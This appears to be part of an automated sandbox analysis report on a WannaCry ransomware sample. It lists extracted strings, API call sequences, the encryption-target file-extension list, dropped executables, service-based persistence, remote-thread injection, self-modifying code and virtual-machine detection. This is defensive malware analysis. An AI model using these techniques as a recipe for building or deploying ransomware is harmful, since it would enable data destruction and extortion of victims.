              Source: mssecsvc.exe.2.drBinary string: d\Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnbr008.cat
              Source: mssecsvc.exe.2.drBinary string: d\Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnca00b.cat
              Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\UAGP35.SYS\W
              Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Windows\System32\drivers\ipnat.sys
              Source: mssecsvc.exe.2.drBinary string: 9\Device\HarddiskVolume2\Windows\System32\catroot2\edb.logp
              Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\usbohci.sys
              Source: mssecsvc.exe.2.drBinary string: ]\Device\HarddiskVolume2\Windows\System32\winevt\Logs\Microsoft-Windows-NCSI%4Operational.evtxp
              Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\adp94xx.sysLP
              Source: mssecsvc.exe.2.drBinary string: b\Device\HarddiskVolume2\Users\
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\WUClient-SelfUpdate-Core~31bf3856ad364e35~x86~~7.6.7600.320.cat
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-VirtualPC-USB-RPM-Package~31bf3856ad364e35~x86~ru-RU~6.1.7601.17514.catp
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010001.widV
              Source: mssecsvc.exe.2.drBinary string: =\Device\HarddiskVolume2\Windows\System32\drivers\GAGP30KX.SYS
              Source: mssecsvc.exe.2.drBinary string: .\Device\HarddiskVolume2\Windows\inf\netip6.PNF
              Source: mssecsvc.exe.2.drBinary string: 5\Device\HarddiskVolume2\Windows\System32\SCardSvr.dll
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini&
              Source: mssecsvc.exe.2.drBinary string: V\Device\HarddiskVolume2\Users\
              Source: mssecsvc.exe.2.drBinary string: D\Device\HarddiskVolume2\Windows\System32\drivers\ru-RU\rdbss.sys.mui\p
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\config\systemprofile\AppData\Local\Avg\av16\temp\avg-27617c4e-7c1a-491f-b8be-a34d5070ed64.tmp|$hH
              Source: mssecsvc.exe.2.drBinary string: \Device\CdRom0PchSmi
              Source: mssecsvc.exe.2.drBinary string: T\Device\HarddiskVolume2\Windows\System32\config\systemprofile\AppData\Local\Avg\av16rp
              Source: mssecsvc.exe.2.drBinary string: d\Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnrc003.catp
              Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\SISAGP.SYSx
              Source: mssecsvc.exe.2.drBinary string: 5\Device\HarddiskVolume2\Windows\System32\timedate.cplp
              Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Windows\System32\drivers\rdpdr.sysl\2
              Source: mssecsvc.exe.2.drBinary string: d\Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnky008.cat
              Source: mssecsvc.exe.2.drBinary string: c\Device\HarddiskVolume2\Windows\System32\config\systemprofile\AppData\Local\Avg\log\av16\fixcfg.log
              Source: mssecsvc.exe.2.drBinary string: 0\Device\HarddiskVolume2\Windows\System32\wmp.dll
              Source: mssecsvc.exe.2.drBinary string: h\Device\HarddiskVolume2\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Cookiesp
              Source: mssecsvc.exe.2.drBinary string: d\Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnca00h.cat
              Source: mssecsvc.exe.2.drBinary string: I\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\netip6.inf_locp
              Source: mssecsvc.exe.2.drBinary string: C\Device\HarddiskVolume2\Windows\System32\drivers\ru-RU\ntfs.sys.mui
              Source: mssecsvc.exe.2.drBinary string: 3\Device\HarddiskVolume2\Windows\System32\FXSSVC.exe
              Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\dxgkrnl.sys
              Source: mssecsvc.exe.2.drBinary string: r\Device\HarddiskVolume2\Windows\System32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\CRLsCPU1
              Source: mssecsvc.exe.2.drBinary string: 1\Device\HarddiskVolume2\Windows\Temp\CR_6DDFF.tmpp
              Source: mssecsvc.exe.2.drBinary string: 0\Device\HarddiskVolume2\Windows\System32\url.dll
              Source: mssecsvc.exe.2.drBinary string: \Device\Harddisk0\DR0p
              Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\nvraid.sys=\(
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Editions-Client-Package~31bf3856ad364e35~x86~~6.1.7601.17514.catrs\p
              Source: mssecsvc.exe.2.drBinary string: 8\Device\HarddiskVolume2\Windows\System32\Tasks\Microsoft$Hp
              Source: mssecsvc.exe.2.drBinary string: E\Device\HarddiskVolume2\Windows\System32\drivers\ru-RU\amdppm.sys.mui
              Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Windows\System32\drivers\tdtcp.sys|$P@
              Source: mssecsvc.exe.2.drBinary string: d\Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnep00d.catp
              Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\SISAGP.SYS8
              Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\HdAudio.sys\/
              Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\SISAGP.SYS3
              Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\VIAAGP.SYS.
              Source: mssecsvc.exe.2.drBinary string: p\Device\HarddiskVolume2\Windows\System32\winevt\Logs\Microsoft-Windows-NetworkAccessProtection%4Operational.evtxxpp
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Indexing-Service-Package~31bf3856ad364e35~x86~ru-RU~6.1.7601.17514.cat\$p
              Source: mssecsvc.exe.2.drBinary string: =\Device\HarddiskVolume2\Windows\System32\drivers\flpydisk.sys
              Source: mssecsvc.exe.2.drBinary string: K\Device\HarddiskVolume2\ProgramData\Microsoft\RAC\StateData\RacDatabase.sdf
              Source: mssecsvc.exe.2.drBinary string: 2\Device\HarddiskVolume2\Windows\System32\Tasks\WPDGtn
              Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\elxstor.sysV
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SampleContent-Ringtones-Package~31bf3856ad364e35~x86~~6.1.7601.17514.cat
              Source: mssecsvc.exe.2.drBinary string: 9\Device\HarddiskVolume2\Program Files\AVG\Av\avgmfapx.exep
              Source: mssecsvc.exe.2.drBinary string: F\Device\HarddiskVolume2\Windows\Prefetch\SEARCHINDEXER.EXE-4A6353B9.pfH
              Source: mssecsvc.exe.2.drBinary string: a\Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\oem12.CAT
              Source: mssecsvc.exe.2.drBinary string: F\Device\HarddiskVolume2\Program Files\AVG Web TuneUp\BundleInstall.exe
              Source: mssecsvc.exe.2.drBinary string: d\Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnrc004.cat
              Source: mssecsvc.exe.2.drBinary string: ?\Device\HarddiskVolume2\Program Files\AVG\UiDll\2623\icudtl.datp
              Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\elxstor.sys\
              Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Windows\System32\drivers\ipnat.sys4
              Source: mssecsvc.exe.2.drBinary string: 0\Device\HarddiskVolume2\Windows\inf\nettcpip.PNFS
              Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\MegaSR.sysDC2
              Source: mssecsvc.exe.2.drBinary string: [\Device\HarddiskVolume2\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatformU3
              Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\umpass.sys
              Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\ql40xx.sys
              Source: mssecsvc.exe.2.drBinary string: =\Device\HarddiskVolume2\Windows\System32\drivers\lsi_scsi.sys
              Source: mssecsvc.exe.2.drBinary string: >\Device\HarddiskVolume2\Windows\System32\drivers\fsdepends.sysd0`p
              Source: mssecsvc.exe.2.drBinary string: d\Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnca00h.catSp
              Source: mssecsvc.exe.2.drBinary string: p\Device\HarddiskVolume2\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\Windows\Cookies\index.dat
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SearchEngine-Client-Package~31bf3856ad364e35~x86~ru-RU~6.1.7601.17514.cat
              Source: mssecsvc.exe.2.drBinary string: |\Device\HarddiskVolume2\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\History\History.IE5\index.datp
              Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-TerminalServices-UsbRedirector-Package~31bf3856ad364e35~x86~ru-RU~6.1.7601.17514.cat:
              Source: mssecsvc.exe.2.drBinary string: G\Device\HarddiskVolume2\Windows\System32\drivers\ru-RU\processr.sys.mui
              Source: mssecsvc.exe.2.drBinary string: C\Device\HarddiskVolume2\Windows\System32\drivers\ru-RU\acpi.sys.mui
              Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Windows\System32\drivers\djsvs.sys
              Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\nvstor.sys2\
              Source: mssecsvc.exe.2.drBinary string: 4\Device\HarddiskVolume2\Windows\System32\rasauto.dll_S
              Source: classification engineClassification label: mal100.rans.troj.evad.winDLL@29/11@24/3
              Source: C:\Windows\mssecsvc.exeCode function: sprintf,OpenSCManagerA,InternetCloseHandle,CreateServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,4_2_00407C40
              Source: C:\Windows\mssecsvc.exeCode function: sprintf,OpenSCManagerA,InternetCloseHandle,CreateServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,8_2_00407C40
              Source: C:\Windows\tasksche.exeCode function: OpenSCManagerA,OpenServiceA,StartServiceA,CloseServiceHandle,sprintf,CreateServiceA,StartServiceA,CloseServiceHandle,CloseServiceHandle,31_2_00401CE8
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_00408090 GetModuleFileNameA,__p___argc,OpenSCManagerA,InternetCloseHandle,OpenServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherA,4_2_00408090
              Source: C:\Windows\mssecsvc.exeCode function: 8_2_00408090 GetModuleFileNameA,__p___argc,OpenSCManagerA,InternetCloseHandle,OpenServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherA,8_2_00408090
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_00407C40 sprintf,OpenSCManagerA,InternetCloseHandle,CreateServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,4_2_00407C40
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_00AC05F2 FindCloseChangeNotification,GetModuleHandleA,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,lstrcpyW,lstrcpyW,lstrcatW,NtMapViewOfSection,NtOpenProcessToken,FindCloseChangeNotification,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,CreateRemoteThread,FindCloseChangeNotification,FindCloseChangeNotification,4_2_00AC05F2
              Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\y2jb4FtSNq.dll,PlayGame
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_00407CE0 InternetCloseHandle,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,FindResourceA,LoadResource,LockResource,SizeofResource,sprintf,sprintf,sprintf,MoveFileExA,CreateFileA,WriteFile,CloseHandle,CreateProcessA,CloseHandle,CloseHandle,4_2_00407CE0
              Source: mssecsvc.exe, 00000004.00000000.263399045.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 00000004.00000002.499291701.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 00000008.00000000.265918603.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 00000008.00000002.348690021.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 0000000C.00000000.275826042.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 0000000C.00000002.351059064.0000000000710000.00000080.00000001.01000000.00000004.sdmp, tasksche.exe, 0000001F.00000002.345559637.000000000040E000.00000008.00000001.01000000.00000007.sdmp, y2jb4FtSNq.dll, tasksche.exe.8.dr, mssecsvc.exe.2.drBinary or memory string: @.der.pfx.key.crt.csr.p12.pem.odt.ott.sxw.stw.uot.3ds.max.3dm.ods.ots.sxc.stc.dif.slk.wb2.odp.otp.sxd.std.uop.odg.otg.sxm.mml.lay.lay6.asc.sqlite3.sqlitedb.sql.accdb.mdb.db.dbf.odb.frm.myd.myi.ibd.mdf.ldf.sln.suo.cs.c.cpp.pas.h.asm.js.cmd.bat.ps1.vbs.vb.pl.dip.dch.sch.brd.jsp.php.asp.rb.java.jar.class.sh.mp3.wav.swf.fla.wmv.mpg.vob.mpeg.asf.avi.mov.mp4.3gp.mkv.3g2.flv.wma.mid.m3u.m4u.djvu.svg.ai.psd.nef.tiff.tif.cgm.raw.gif.png.bmp.jpg.jpeg.vcd.iso.backup.zip.rar.7z.gz.tgz.tar.bak.tbk.bz2.PAQ.ARC.aes.gpg.vmx.vmdk.vdi.sldm.sldx.sti.sxi.602.hwp.snt.onetoc2.dwg.pdf.wk1.wks.123.rtf.csv.txt.vsdx.vsd.edb.eml.msg.ost.pst.potm.potx.ppam.ppsx.ppsm.pps.pot.pptm.pptx.ppt.xltm.xltx.xlc.xlm.xlt.xlw.xlsb.xlsm.xlsx.xls.dotx.dotm.dot.docm.docb.docx.docWANACRY!%s\%sCloseHandleDeleteFileWMoveFileExWMoveFileWReadFileWriteFileCreateFileWkernel32.dll
              Source: mssecsvc.exeString found in binary or memory: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-StarterEdition-wrapper~3
              Source: mssecsvc.exeString found in binary or memory: O\Device\HarddiskVolume2\Windows\Temp\avg_a04392\avg-secure-search-installer.exe
              Source: mssecsvc.exeString found in binary or memory: O\Device\HarddiskVolume2\Windows\Temp\avg_a04160\avg-secure-search-installer.exe
              Source: mssecsvc.exeString found in binary or memory: O\Device\HarddiskVolume2\Windows\Temp\avg_a01924\avg-secure-search-installer.exe2
              Source: mssecsvc.exeString found in binary or memory: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-IIS-WebServer-AddOn-2-Pa
              Source: mssecsvc.exeString found in binary or memory: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Server-Help-Package.ClientUltimate~31bf385
              Source: mssecsvc.exeString found in binary or memory: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-IIS-WebServer-AddOn-Pack
              Source: mssecsvc.exeString found in binary or memory: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Help-CoreClientUAUE-Pack
              Source: mssecsvc.exeString found in binary or memory: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Help-Customization-Packa
              Source: mssecsvc.exeString found in binary or memory: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-StarterEdition-wrapper~3
              Source: mssecsvc.exeString found in binary or memory: O\Device\HarddiskVolume2\Windows\Temp\avg_a04392\avg-secure-search-installer.exe
              Source: mssecsvc.exeString found in binary or memory: O\Device\HarddiskVolume2\Windows\Temp\avg_a04160\avg-secure-search-installer.exe
              Source: mssecsvc.exeString found in binary or memory: O\Device\HarddiskVolume2\Windows\Temp\avg_a01924\avg-secure-search-installer.exe2
              Source: mssecsvc.exeString found in binary or memory: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-IIS-WebServer-AddOn-2-Pa
              Source: mssecsvc.exeString found in binary or memory: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Server-Help-Package.ClientUltimate~31bf385
              Source: mssecsvc.exeString found in binary or memory: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-IIS-WebServer-AddOn-Pack
              Source: mssecsvc.exeString found in binary or memory: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Help-CoreClientUAUE-Pack
              Source: mssecsvc.exeString found in binary or memory: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Help-Customization-Packa
              Source: mssecsvc.exeString found in binary or memory: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-StarterEdition-wrapper~3
              Source: mssecsvc.exeString found in binary or memory: O\Device\HarddiskVolume2\Windows\Temp\avg_a04392\avg-secure-search-installer.exe
              Source: mssecsvc.exeString found in binary or memory: O\Device\HarddiskVolume2\Windows\Temp\avg_a04160\avg-secure-search-installer.exe
              Source: mssecsvc.exeString found in binary or memory: O\Device\HarddiskVolume2\Windows\Temp\avg_a01924\avg-secure-search-installer.exe2
              Source: mssecsvc.exeString found in binary or memory: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-IIS-WebServer-AddOn-2-Pa
              Source: mssecsvc.exeString found in binary or memory: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Server-Help-Package.ClientUltimate~31bf385
              Source: mssecsvc.exeString found in binary or memory: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-IIS-WebServer-AddOn-Pack
              Source: mssecsvc.exeString found in binary or memory: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Help-CoreClientUAUE-Pack
              Source: mssecsvc.exeString found in binary or memory: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Help-Customization-Packa
              Source: C:\Windows\mssecsvc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\mssecsvc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\mssecsvc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\mssecsvc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\backgroundTaskHost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\backgroundTaskHost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: y2jb4FtSNq.dllStatic file information: File size 5267459 > 1048576
              Source: y2jb4FtSNq.dllStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x501000
              Source: C:\Windows\tasksche.exeCode function: 31_2_00407710 push eax; ret 31_2_0040773E
              Source: C:\Windows\tasksche.exeCode function: 31_2_004076C8 push eax; ret 31_2_004076E6
              Source: mssecsvc.exe.2.drStatic PE information: section name: jirjvcn
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_00AC3D36 LoadLibraryA,GetProcAddress,LoadLibraryA,GetTickCount,GetVolumeInformationA,GetModuleFileNameA,wsprintfA,CreateThread,CloseHandle,CreateThread,CloseHandle,CreateEventA,socket,connect,GetVersionExA,wsprintfA,CreateThread,CloseHandle,GetTickCount,4_2_00AC3D36

              Persistence and Installation Behavior

              barindex
              Drops executables to the windows directory (C:\Windows) and starts them
              Source: C:\Windows\SysWOW64\rundll32.exeExecutable created and started: C:\WINDOWS\mssecsvc.exeJump to behavior
              Source: C:\Windows\mssecsvc.exeExecutable created and started: C:\WINDOWS\tasksche.exeJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\mssecsvc.exeJump to dropped file
              Source: C:\Windows\mssecsvc.exeFile created: C:\Windows\tasksche.exeJump to dropped file
              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\mssecsvc.exeJump to dropped file
              Source: C:\Windows\mssecsvc.exeFile created: C:\Windows\tasksche.exeJump to dropped file
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_00407C40 sprintf,OpenSCManagerA,InternetCloseHandle,CreateServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,4_2_00407C40
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\mssecsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\mssecsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\mssecsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\mssecsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Tries to evade debugger and weak emulator (self modifying code)
              Source: C:\Windows\mssecsvc.exeSpecial instruction interceptor: First address: 0000000000A6B538 instructions caused by: Self-modifying code
              Contains functionality to detect sleep reduction / modifications
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_00AC41784_2_00AC4178
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_7FEA41784_2_7FEA4178
              Source: C:\Windows\System32\svchost.exe TID: 5608Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\System32\svchost.exe TID: 5836Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_00AC042D rdtsc 4_2_00AC042D
              Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_7FEA41784_2_7FEA4178
              Source: C:\Windows\mssecsvc.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 120000Jump to behavior
              Source: C:\Windows\System32\backgroundTaskHost.exeFile opened: C:\Windows\System32\TileDataRepository.dllJump to behavior
              Source: C:\Windows\System32\backgroundTaskHost.exeFile opened: C:\Windows\system32\Windows.StateRepository.dllJump to behavior
              Source: C:\Windows\System32\backgroundTaskHost.exeFile opened: C:\Windows\System32\ContentDeliveryManager.Utilities.dllJump to behavior
              Source: C:\Windows\System32\backgroundTaskHost.exeFile opened: C:\Windows\SYSTEM32\usermgrcli.dllJump to behavior
              Source: C:\Windows\System32\backgroundTaskHost.exeFile opened: C:\Windows\system32\StateRepository.Core.dllJump to behavior
              Source: C:\Windows\System32\backgroundTaskHost.exeFile opened: C:\Windows\System32\usermgrproxy.dllJump to behavior
              Source: dwm.exe, 0000001A.00000002.792323220.0000026F19D40000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VEN_15AD&DEV_07A0&SUBSYS_07A015AD&REV_01\3&61aaa01&0&C7ACPI\PNP0200\4&1bd7f811&0ROOT\UMBUS\0000SCSI\Disk&Ven_VMware&Prod_Virt+
              Source: svchost.exe, 0000000F.00000002.791275614.000001BC27436000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@vmicheartbeat
              Source: svchost.exe, 00000021.00000000.360470749.00000219BFEB5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@Allow inbound TCP port 636 traffic for vmicheartbeatLMEMp
              Source: dwm.exe, 0000001A.00000002.796029603.0000026F1A010000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000O
              Source: svchost.exe, 00000021.00000000.357765748.00000219BF80B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ,@Block any other outbound traffic for vmicheartbeat
              Source: svchost.exe, 00000021.00000000.357765748.00000219BF80B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ,@vmicheartbeat-block-out
              Source: mssecsvc.exeBinary or memory string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Hyper-V-Common-Drivers-Package~3
              Source: mssecsvc.exe, 00000004.00000000.263399045.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 00000004.00000002.499291701.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 00000008.00000000.265918603.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 00000008.00000002.348690021.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 0000000C.00000000.275826042.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 0000000C.00000002.351059064.0000000000710000.00000080.00000001.01000000.00000004.sdmp, tasksche.exe, 0000001F.00000000.342421890.0000000000410000.00000002.00000001.01000000.00000007.sdmp, y2jb4FtSNq.dll, tasksche.exe.8.dr, mssecsvc.exe.2.drBinary or memory string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Hyper-V-Guest-Integration-Drivers-Package~31bf3856ad364e35~x86~~6.1.7601.17514.cat
              Source: svchost.exe, 00000021.00000000.360470749.00000219BFEB5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@Allow outbound TCP traffic for vmicheartbeatLMEM`
              Source: mssecsvc.exe, 00000008.00000002.351098719.0000000000D57000.00000004.00000020.00020000.00000000.sdmp, mssecsvc.exe, 00000008.00000002.351313232.0000000000DA1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.785675445.000001A291628000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.300410315.000001A291628000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.294275035.000001A291628000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.674409764.00000159F6C2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.675624500.00000159FC254000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: svchost.exe, 00000021.00000000.357765748.00000219BF80B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Block any other inbound traffic for vmicheartbeat
              Source: svchost.exe, 00000021.00000000.357765748.00000219BF80B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ,@vmicheartbeat-allow-out
              Source: svchost.exe, 00000021.00000000.357765748.00000219BF80B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $@vmicvss-block-out
